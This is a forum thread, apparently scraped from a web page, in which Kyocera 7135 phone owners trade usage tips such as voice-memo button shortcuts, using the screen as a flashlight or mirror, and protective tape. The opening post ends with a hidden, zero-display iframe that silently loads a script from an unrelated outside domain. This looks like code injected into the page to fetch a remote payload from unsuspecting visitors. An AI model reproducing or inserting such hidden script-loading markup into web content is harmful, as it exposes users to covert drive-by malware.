+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Best 7135 tips/tricks

What are everybody's favorite tips/tricks for making the phone easier to use and if anyone has any Easter Eggs/hidden tricks for the phone?

I found my keys the other night in pitch darkness after I pulled out my 7135 and used it as a flashlight. :awink

Oh, by the way Happy Easter!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Best 7135 tips/tricks

Originally posted by frenzytom

I found my keys the other night in pitch darkness after I pulled out my 7135 and used it as a flashlight. :awink
    I use my iPod for that...

Color Easter Eggs, interesting.............:blue

Re: Best 7135 tips/tricks

Originally posted by frenzytom
    I do that all the time... but the tricky thing is to use the screen as a flashlight to hook it up to the charger on my nightstand when the lights are already out! (it's a tough angle :p ). And I use my 7135 as my alarm clock... it lays on a soft folded up wash cloth facing towards the bed with the top display lit up so I can see the time
    Please visit my picture site: Robert-O-Rama :)

With the lid up, you can use it as a back scratcher.

Voice memo recorder tip

Two days ago I was just about to ask if there was a shortcut for the voice memo and someone from the forum threads posted this tip/fix:

Instead of tapping thru 5 key strokes to get to voice memo record mode . . . (Try this one at 65 mph with a cup of java in your left hand and the 7135 in your right) So this tip said to go into pref Palm and then buttons . . . and change (any hard button) I chose the web on the right and made it from web to memos. Thats all you have to do.
    This hard key was the old palm's memo button anyway.

So the best part is somehow, I don't know how, when you make a hard button the memo . . . it automatically (it's really magical) when you hold this button down for a sec or so, it goes right into the "record after the tone" mode and after your memo you just hit the same button to stop it. I was really disappointed the next day after I got my 7135 and saw the steps I had to go thru unlike the jog dial shortcut on the 6035 to access the memo recorder especially when driving is when I most need to make a memo.
    I was dreading the thought of carrying around my small voice recoder again, after I saw what one had to go through to record a voice memo. You can always access the web by tapping on the Web icon in applications, which the hard button on the right defaulted to before you changed it to voice memo.

So let's review . . the 7135 now replaces a palm, a phone, a voice recorder, a GPS, an MP3 player, a photo album, a 3g web surfer etc . . Oh but Walter . . It's Soooo BULKY . . . I think NOT!

This voice recorder memo tip was great for me and thanks to the member who drew my attention to it . . . and thanks to the forum for all of your help.

Red
    I use mine in vibrate mode....nevermind.
    :devillook
    Finally a new owner! And loving it!!!

Originally posted by Red
    I use mine in vibrate mode....nevermind.
    :devillook
    Be careful, you could lose it...

I have HBX running. I try to assign memo to a hard button, it'll take me to memo (as opposed to an hbx assigned app) but it WON'T take me to voice memo. So close, yet so far....

Red
    Originally posted by RUYORK
    Be careful, you could lose it...
    Robert taught me how to do that!...blame him!!!
    Finally a new owner! And loving it!!!

dkr
    If you press the backlight key, just below the 0 key, you can use the 7135 as a mirror, assuming you are in good lighting. Good for seeing what people or things behind you are doing

DKR.

Never involved in a flame war! sputnik's Avatar
    heh, i used to use PalmMirror on my old pilot professional, it just changed the screen to a bunch of black (gray) pixels
    it's actually still available, but says that it "might" have a problem with color screens

Originally posted by dkr
    If you press the backlight key, just below the 0 key, you can use the 7135 as a mirror, assuming you are in good lighting. Good for seeing what people or things behind you are doing

DKR.
    _______
    Spu|nik VZW Kyo 7135 / VZW XV6600 / Sprint Mogul / Sprint Touch Pro / Sprint Touch Pro 2 / Apple iPhone 4 / ???

dkr
    I tried PalmMirror on the 7135 and was very disappointed. Turning off the backlight definitely works though!

DKR.

Originally posted by liltiki
    I have HBX running. I try to assign memo to a hard button, it'll take me to memo (as opposed to an hbx assigned app) but it WON'T take me to voice memo. So close, yet so far....
    Are you holding the button down long enough (couple of seconds)?

MDL

Yes, it just takes me to regular memo menu.

T-

That's what it's supposed to do. Keep holding it down until the voice memo screen pops up (another second or two).
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

IT WORKED1!! You really had to hold it a while. Thanks Kraz...

t

A little tip

For years I have placed a strip of Scotch brand removable tape (blue package) over my graffiti area. Not only is it very inexpensive, but it protects the area from scratches and best of all gives a "writing on paper" feel. I love it.

Ignore the man behind the curtain. He posts without finishing reading the thread. He is an idiot. Nothing to see here. Carry on.
    ---------------
    The same thing we do every night, Pinky...

?